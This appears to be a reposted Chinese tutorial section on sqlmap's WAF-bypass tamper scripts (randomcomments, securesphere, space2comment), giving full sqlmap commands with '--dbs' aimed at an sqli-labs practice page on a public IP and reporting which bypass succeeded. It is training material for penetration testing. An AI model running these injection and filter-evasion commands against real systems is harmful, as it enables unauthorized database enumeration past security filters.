sqlmap从入门到精通-第七章-7-17 绕过WAF脚本-randomcomments.py&space2comment.py


35. randomcomments.py脚本

在payload关键字中随机插入/**/,可以绕过关键字过滤,适用于所有数据库

实战演示:

测试地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="randomcomments.py" --proxy="http://127.0.0.1:8080" -batch

 并未注入成功,看看burp抓包的效果

效果已经有了针对关键的payload增加/**/

=====================================================================================================================================

36. securesphere.py脚本

添加经过特殊构造的字符串,在payload后面加入字符串,据说是可以自定义的,适用于所有数据库

实战演示:

测试地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="securesphere.py" --proxy="http://127.0.0.1:8080" -batch

新版本的sqlmap已经不存在这个

====================================================================================================================================

37. space2comment.py脚本

使用/**/替换空格符,主要用于空格的绕过

测试地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="space2comment.py" --proxy="http://127.0.0.1:8080" -batch

发现是可以注入的,看看burp抓包情况

 


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM